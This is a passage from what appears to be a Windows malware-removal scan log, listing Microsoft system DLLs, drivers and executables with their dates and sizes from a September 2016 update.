2016-09-29 15:13 - 2016-09-15 09:49 - 00653312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2016-09-29 15:13 - 2016-09-15 09:48 - 01321472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_fs.dll
2016-09-29 15:13 - 2016-09-15 09:48 - 01112576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_health.dll
2016-09-29 15:13 - 2016-09-15 09:47 - 01077760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Editing.dll
2016-09-29 15:13 - 2016-09-15 09:47 - 00134656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Energy.dll
2016-09-29 15:13 - 2016-09-15 09:46 - 03305984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2016-09-29 15:13 - 2016-09-15 09:45 - 02642944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2016-09-29 15:13 - 2016-09-15 09:45 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dlnashext.dll
2016-09-29 15:13 - 2016-09-15 09:44 - 00209920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSAC3ENC.DLL
2016-09-29 15:13 - 2016-09-15 09:43 - 00271872 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfksproxy.dll
2016-09-29 15:13 - 2016-09-15 09:42 - 01220608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll
2016-09-29 15:13 - 2016-09-15 09:42 - 00719872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_sr.dll
2016-09-29 15:13 - 2016-09-15 09:42 - 00492544 _____ (Microsoft Corporation) C:\WINDOWS\system32\nltest.exe
2016-09-29 15:13 - 2016-09-15 09:42 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\winhvr.sys
2016-09-29 15:13 - 2016-09-15 09:41 - 00259072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.SyncEngine.dll
2016-09-29 15:13 - 2016-09-15 09:41 - 00185344 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll
2016-09-29 15:13 - 2016-09-15 09:41 - 00156160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.Client.dll
2016-09-29 15:13 - 2016-09-15 09:41 - 00108032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.Authentication.dll
2016-09-29 15:13 - 2016-09-15 09:40 - 02026496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2016-09-29 15:13 - 2016-09-15 09:40 - 01988096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2016-09-29 15:13 - 2016-09-15 09:40 - 00249856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BthLEEnum.sys
2016-09-29 15:13 - 2016-09-15 09:40 - 00140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\RMapi.dll
2016-09-29 15:13 - 2016-09-15 09:40 - 00092672 _____ (Microsoft Corporation) C:\WINDOWS\system32\BthRadioMedia.dll
2016-09-29 15:13 - 2016-09-15 09:40 - 00082432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.UserDeviceAssociation.dll
2016-09-29 15:13 - 2016-09-15 09:39 - 00827904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.appcore.dll
2016-09-29 15:13 - 2016-09-15 09:39 - 00408576 _____ (Microsoft Corporation) C:\WINDOWS\system32\NgcCtnr.dll
2016-09-29 15:13 - 2016-09-15 09:39 - 00368640 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneBackupHandler.dll
2016-09-29 15:13 - 2016-09-15 09:39 - 00322048 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2016-09-29 15:13 - 2016-09-15 09:39 - 00234496 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Flights.dll
2016-09-29 15:13 - 2016-09-15 09:38 - 00691200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2016-09-29 15:13 - 2016-09-15 09:38 - 00671232 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkCollectionAgent.dll
2016-09-29 15:13 - 2016-09-15 09:38 - 00573952 _____ (Microsoft Corporation) C:\WINDOWS\system32\NgcCtnrGidsHandler.dll
2016-09-29 15:13 - 2016-09-15 09:38 - 00505856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFiDirect.dll
2016-09-29 15:13 - 2016-09-15 09:38 - 00343552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SmartCards.Phone.dll
2016-09-29 15:13 - 2016-09-15 09:38 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\provops.dll
2016-09-29 15:13 - 2016-09-15 09:38 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SerialCommunication.dll
2016-09-29 15:13 - 2016-09-15 09:38 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\appinfo.dll
2016-09-29 15:13 - 2016-09-15 09:37 - 00690176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2016-09-29 15:13 - 2016-09-15 09:37 - 00568320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.LowLevel.dll
2016-09-29 15:13 - 2016-09-15 09:37 - 00279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.HumanInterfaceDevice.dll
2016-09-29 15:13 - 2016-09-15 09:36 - 00686592 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsregcmd.exe
2016-09-29 15:13 - 2016-09-15 09:36 - 00648192 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2016-09-29 15:13 - 2016-09-15 09:36 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngccredprov.dll
2016-09-29 15:13 - 2016-09-15 09:36 - 00407552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2016-09-29 15:13 - 2016-09-15 09:36 - 00310784 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncSettings.dll
2016-09-29 15:13 - 2016-09-15 09:36 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2016-09-29 15:13 - 2016-09-15 09:36 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\setupugc.exe
2016-09-29 15:13 - 2016-09-15 09:35 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\DataExchange.dll
2016-09-29 15:13 - 2016-09-15 09:35 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\system32\easwrt.dll
2016-09-29 15:13 - 2016-09-15 09:34 - 00441856 _____ (Microsoft Corporation) C:\WINDOWS\system32\AccountsRt.dll
2016-09-29 15:13 - 2016-09-15 09:34 - 00437248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Usb.dll
2016-09-29 15:13 - 2016-09-15 09:34 - 00284160 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll
2016-09-29 15:13 - 2016-09-15 09:33 - 03753984 _____ (Microsoft Corporation) C:\WINDOWS\system32\bootux.dll
2016-09-29 15:13 - 2016-09-15 09:33 - 01004032 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-09-29 15:13 - 2016-09-15 09:33 - 00963584 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebcamUi.dll
2016-09-29 15:13 - 2016-09-15 09:33 - 00512000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprapi.dll
2016-09-29 15:13 - 2016-09-15 09:32 - 02716672 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmSvc.dll
2016-09-29 15:13 - 2016-09-15 09:32 - 00634368 _____ (Microsoft Corporation) C:\WINDOWS\system32\StructuredQuery.dll
2016-09-29 15:13 - 2016-09-15 09:31 - 01053184 _____ (Microsoft Corporation) C:\WINDOWS\system32\qmgr.dll
2016-09-29 15:13 - 2016-09-15 09:31 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManHTTPConfig.exe
2016-09-29 15:13 - 2016-09-15 09:30 - 01639424 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll
2016-09-29 15:13 - 2016-09-15 09:29 - 00720896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.BackgroundMediaPlayback.dll
2016-09-29 15:13 - 2016-09-15 09:29 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\system32\RelPost.exe
2016-09-29 15:13 - 2016-09-15 09:28 - 03288064 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll
2016-09-29 15:13 - 2016-09-15 09:28 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2016-09-29 15:13 - 2016-09-15 09:28 - 00718848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Playback.BackgroundMediaPlayer.dll
2016-09-29 15:13 - 2016-09-15 09:27 - 02860032 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi.dll
2016-09-29 15:13 - 2016-09-15 09:27 - 00942080 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-09-29 15:13 - 2016-09-15 09:27 - 00702976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Playback.MediaPlayer.dll
2016-09-29 15:13 - 2016-09-15 09:26 - 00501248 _____ (Microsoft Corporation) C:\WINDOWS\system32\imapi2.dll
2016-09-29 15:13 - 2016-09-15 09:25 - 00628736 _____ (Microsoft Corporation) C:\WINDOWS\system32\uReFS.dll
2016-09-29 15:13 - 2016-09-15 09:25 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\BackgroundMediaPolicy.dll
2016-09-29 15:13 - 2016-09-15 09:23 - 04474368 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2016-09-29 15:13 - 2016-09-15 09:23 - 01361408 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2016-09-29 15:13 - 2016-09-15 09:23 - 01020928 _____ (Microsoft Corporation) C:\WINDOWS\system32\usermgr.dll
2016-09-29 15:13 - 2016-09-15 09:23 - 00611328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.dll
2016-09-29 15:13 - 2016-09-15 09:23 - 00347648 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2016-09-29 15:13 - 2016-09-15 09:22 - 05611008 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2016-09-29 15:13 - 2016-09-15 09:22 - 01709056 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtsvc.dll
2016-09-29 15:13 - 2016-09-15 09:22 - 01643008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.dll
2016-09-29 15:13 - 2016-09-15 09:22 - 00770560 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2016-09-29 15:13 - 2016-09-15 09:22 - 00376832 _____ (Microsoft Corporation) C:\WINDOWS\system32\CryptoWinRT.dll
2016-09-29 15:13 - 2016-09-15 09:21 - 00971264 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll
2016-09-29 15:13 - 2016-09-15 09:20 - 02424320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Perception.dll
2016-09-29 15:13 - 2016-09-15 09:20 - 02095616 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2016-09-29 15:13 - 2016-09-15 09:20 - 01710080 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2016-09-29 15:13 - 2016-09-15 09:20 - 01275392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll
2016-09-29 15:13 - 2016-09-15 09:19 - 03202048 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2016-09-29 15:13 - 2016-09-15 09:19 - 00730112 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2016-09-29 15:13 - 2016-09-15 09:18 - 01369088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Phone.dll
2016-09-29 15:13 - 2016-09-15 09:18 - 00455168 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenrollengine.dll
2016-09-29 15:13 - 2016-09-15 09:17 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\system32\enrollmentapi.dll
2016-09-29 15:13 - 2016-09-15 09:16 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\spaceman.exe
2016-09-29 15:13 - 2016-08-05 20:34 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\smphost.dll
2016-09-29 15:13 - 2016-08-05 01:29 - 00568832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.UXRes.dll
2016-09-29 15:12 - 2016-09-15 10:37 - 00590960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2016-09-29 15:12 - 2016-09-15 10:37 - 00496872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll
2016-09-29 15:12 - 2016-09-15 10:29 - 00424640 _____ (Microsoft Corporation) C:\WINDOWS\system32\ws2_32.dll
2016-09-29 15:12 - 2016-09-15 10:29 - 00169056 _____ (Microsoft Corporation) C:\WINDOWS\system32\skci.dll
2016-09-29 15:12 - 2016-09-15 10:29 - 00074080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vpci.sys
2016-09-29 15:12 - 2016-09-15 10:27 - 01883784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-09-29 15:12 - 2016-09-15 10:27 - 00128352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\partmgr.sys
2016-09-29 15:12 - 2016-09-15 10:25 - 00340320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2016-09-29 15:12 - 2016-09-15 10:25 - 00280472 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdeunlock.exe
2016-09-29 15:12 - 2016-09-15 10:22 - 00433832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWanAPI.dll
2016-09-29 15:12 - 2016-09-15 10:21 - 00272720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wintrust.dll
2016-09-29 15:12 - 2016-09-15 10:18 - 06654616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-09-29 15:12 - 2016-09-15 10:15 - 00557408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys
2016-09-29 15:12 - 2016-09-15 10:15 - 00335712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2016-09-29 15:12 - 2016-09-15 10:14 - 01415752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2016-09-29 15:12 - 2016-09-15 10:14 - 00947552 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi
2016-09-29 15:12 - 2016-09-15 10:14 - 00811872 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe
2016-09-29 15:12 - 2016-09-15 10:14 - 00435040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys
2016-09-29 15:12 - 2016-09-15 10:12 - 01472536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll
2016-09-29 15:12 - 2016-09-15 10:11 - 01990640 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2016-09-29 15:12 - 2016-09-15 10:11 - 01300600 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2016-09-29 15:12 - 2016-09-15 10:11 - 01066104 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-09-29 15:12 - 2016-09-15 10:11 - 00862064 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfreadwrite.dll
2016-09-29 15:12 - 2016-09-15 10:11 - 00725664 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2016-09-29 15:12 - 2016-09-15 10:11 - 00160096 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll
2016-09-29 15:12 - 2016-09-15 10:08 - 05683712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-09-29 15:12 - 2016-09-15 10:07 - 01572768 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2016-09-29 15:12 - 2016-09-15 10:07 - 01418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2016-09-29 15:12 - 2016-09-15 10:07 - 00128864 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmapi.dll
2016-09-29 15:12 - 2016-09-15 10:06 - 00372440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MediaControl.dll
2016-09-29 15:12 - 2016-09-15 10:01 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Radios.dll
2016-09-29 15:12 - 2016-09-15 09:59 - 00255488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\unimdm.tsp
2016-09-29 15:12 - 2016-09-15 09:59 - 00136192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinRtTracing.dll
2016-09-29 15:12 - 2016-09-15 09:58 - 00291840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Search.ProtocolHandler.MAPI2.dll
2016-09-29 15:12 - 2016-09-15 09:58 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovhost.dll
2016-09-29 15:12 - 2016-09-15 09:58 - 00142336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFi.dll
2016-09-29 15:12 - 2016-09-15 09:58 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SerialCommunication.dll
2016-09-29 15:12 - 2016-09-15 09:57 - 00392192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.Input.dll
2016-09-29 15:12 - 2016-09-15 09:57 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.XboxLive.Storage.dll
2016-09-29 15:12 - 2016-09-15 09:57 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ClipboardServer.dll
2016-09-29 15:12 - 2016-09-15 09:56 - 01300480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2016-09-29 15:12 - 2016-09-15 09:56 - 00609280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Import.dll
2016-09-29 15:12 - 2016-09-15 09:56 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2016-09-29 15:12 - 2016-09-15 09:56 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Core.dll
2016-09-29 15:12 - 2016-09-15 09:55 - 00386048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFiDirect.dll
2016-09-29 15:12 - 2016-09-15 09:55 - 00325120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll
2016-09-29 15:12 - 2016-09-15 09:55 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WwaApi.dll
2016-09-29 15:12 - 2016-09-15 09:55 - 00185856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Identity.Provider.dll
2016-09-29 15:12 - 2016-09-15 09:55 - 00114176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setupugc.exe
2016-09-29 15:12 - 2016-09-15 09:54 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll
2016-09-29 15:12 - 2016-09-15 09:54 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Picker.dll
2016-09-29 15:12 - 2016-09-15 09:53 - 00819200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppContracts.dll
2016-09-29 15:12 - 2016-09-15 09:52 - 00500224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.dll
2016-09-29 15:12 - 2016-09-15 09:52 - 00445952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprapi.dll
2016-09-29 15:12 - 2016-09-15 09:52 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2016-09-29 15:12 - 2016-09-15 09:51 - 00762368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprddm.dll
2016-09-29 15:12 - 2016-09-15 09:50 - 00071168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pwrshplugin.dll
2016-09-29 15:12 - 2016-09-15 09:49 - 00468992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.InkControls.dll
2016-09-29 15:12 - 2016-09-15 09:48 - 01320448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comsvcs.dll
2016-09-29 15:12 - 2016-09-15 09:46 - 00795648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MiracastReceiver.dll
2016-09-29 15:12 - 2016-09-15 09:46 - 00471552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.BackgroundMediaPlayback.dll
2016-09-29 15:12 - 2016-09-15 09:46 - 00343040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll
2016-09-29 15:12 - 2016-09-15 09:45 - 02749440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll
2016-09-29 15:12 - 2016-09-15 09:45 - 00470016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Playback.BackgroundMediaPlayer.dll
2016-09-29 15:12 - 2016-09-15 09:44 - 02153984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi.dll
2016-09-29 15:12 - 2016-09-15 09:44 - 00459776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Playback.MediaPlayer.dll
2016-09-29 15:12 - 2016-09-15 09:44 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2016-09-29 15:12 - 2016-09-15 09:43 - 03520512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xpsrchvw.exe
2016-09-29 15:12 - 2016-09-15 09:43 - 03196416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll
2016-09-29 15:12 - 2016-09-15 09:43 - 00220672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToReceiver.dll
2016-09-29 15:12 - 2016-09-15 09:43 - 00090112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2016-09-29 15:12 - 2016-09-15 09:43 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2016-09-29 15:12 - 2016-09-15 09:42 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BackgroundMediaPolicy.dll
2016-09-29 15:12 - 2016-09-15 09:41 - 00400384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2016-09-29 15:12 - 2016-09-15 09:41 - 00357376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Geolocation.dll
2016-09-29 15:12 - 2016-09-15 09:41 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\unimdm.tsp
2016-09-29 15:12 - 2016-09-15 09:40 - 02138112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2016-09-29 15:12 - 2016-09-15 09:40 - 01656320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Perception.dll
2016-09-29 15:12 - 2016-09-15 09:40 - 01247232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Globalization.dll
2016-09-29 15:12 - 2016-09-15 09:40 - 00467968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.XboxLive.Storage.dll
2016-09-29 15:12 - 2016-09-15 09:40 - 00395264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmenrollengine.dll
2016-09-29 15:12 - 2016-09-15 09:40 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Background.SystemEventsBroker.dll
2016-09-29 15:12 - 2016-09-15 09:40 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2016-09-29 15:12 - 2016-09-15 09:39 - 01232384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Maps.dll
2016-09-29 15:12 - 2016-09-15 09:39 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Phone.dll
2016-09-29 15:12 - 2016-09-15 09:39 - 01004544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2016-09-29 15:12 - 2016-09-15 09:38 - 00773120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2016-09-29 15:12 - 2016-09-15 09:38 - 00620544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2016-09-29 15:12 - 2016-09-15 09:38 - 00427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmrdvcore.dll
2016-09-29 15:12 - 2016-09-15 09:38 - 00349696 _____ (Microsoft Corporation) C:\WINDOWS\system32\icsvcext.dll
2016-09-29 15:12 - 2016-09-15 09:38 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenance.dll
2016-09-29 15:12 - 2016-09-15 09:37 - 01507840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.FaceAnalysis.dll
2016-09-29 15:12 - 2016-09-15 09:37 - 00912384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SmartCards.dll
2016-09-29 15:12 - 2016-09-15 09:37 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlancfg.dll
2016-09-29 15:12 - 2016-09-15 09:37 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\system32\biwinrt.dll
2016-09-29 15:12 - 2016-09-15 09:37 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2016-09-29 15:12 - 2016-09-15 09:36 - 00719360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2016-09-29 15:12 - 2016-09-15 09:36 - 00448512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TpmCoreProvisioning.dll
2016-09-29 15:12 - 2016-09-15 09:36 - 00387584 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2016-09-29 15:12 - 2016-09-15 09:36 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll
2016-09-29 15:12 - 2016-09-15 09:36 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
2016-09-29 15:12 - 2016-09-15 09:36 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.CredDialogController.dll
2016-09-29 15:12 - 2016-09-15 09:35 - 00645120 _____ (Microsoft Corporation) C:\WINDOWS\system32\qedit.dll
2016-09-29 15:12 - 2016-09-15 09:35 - 00472064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll
2016-09-29 15:12 - 2016-09-15 09:35 - 00432640 _____ (Microsoft Corporation) C:\WINDOWS\system32\SndVolSSO.dll
2016-09-29 15:12 - 2016-09-15 09:35 - 00331776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SessEnv.dll
2016-09-29 15:12 - 2016-09-15 09:35 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\rshx32.dll
2016-09-29 15:12 - 2016-09-15 09:34 - 00642048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.InkControls.dll
2016-09-29 15:12 - 2016-09-15 09:33 - 00966144 _____ (Microsoft Corporation) C:\WINDOWS\system32\sbe.dll
2016-09-29 15:12 - 2016-09-15 09:33 - 00560128 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2016-09-29 15:12 - 2016-09-15 09:31 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\pwrshplugin.dll
2016-09-29 15:12 - 2016-09-15 09:30 - 03776512 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2016-09-29 15:12 - 2016-09-15 09:30 - 01403392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Editing.dll
2016-09-29 15:12 - 2016-09-15 09:30 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2016-09-29 15:12 - 2016-09-15 09:30 - 00169984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Energy.dll
2016-09-29 15:12 - 2016-09-15 09:29 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvecpl.dll
2016-09-29 15:12 - 2016-09-15 09:28 - 00442368 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll
